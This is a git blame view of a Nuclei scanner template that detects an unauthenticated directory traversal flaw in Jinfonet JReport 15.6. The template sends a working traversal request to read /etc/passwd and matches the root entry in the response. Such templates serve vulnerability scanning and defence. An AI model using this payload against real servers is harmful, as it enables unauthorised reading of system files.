daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/vulnerabilities/other/jinfornet-jreport-lfi.yaml

29 lines
885 B
YAML
Raw Normal View History

Create jinfornet-jreport-lfi.yaml
2022-01-03 00:27:54 +00:00
id: jinfornet-jreport-lfi
info:
name: Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal
author: 0x_Akoko
severity: high
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
description: Jreport Help function have a path traversal vulnerability in the SendFileServlet allows remote unauthenticated users to view any files on the Operating System with Application services user permission.
This vulnerability affects Windows and Unix operating systems.
Update and rename jinfornet-jreport-lfi.yaml to vulnerabilities/other/jinfornet-jreport-lfi.yaml
2022-01-03 04:31:12 +00:00
reference:
- https://cxsecurity.com/issue/WLB-2020030151
- https://www.jinfonet.com/product/download-jreport/
Create jinfornet-jreport-lfi.yaml
2022-01-03 00:27:54 +00:00
tags: jreport,jinfornet,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/jreport/sendfile/help/../../../../../../../../../../../../../../etc/passwd"
matchers-condition: and
matchers:
- type: regex
Update and rename jinfornet-jreport-lfi.yaml to vulnerabilities/other/jinfornet-jreport-lfi.yaml
2022-01-03 04:31:12 +00:00
part: body
Create jinfornet-jreport-lfi.yaml
2022-01-03 00:27:54 +00:00
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200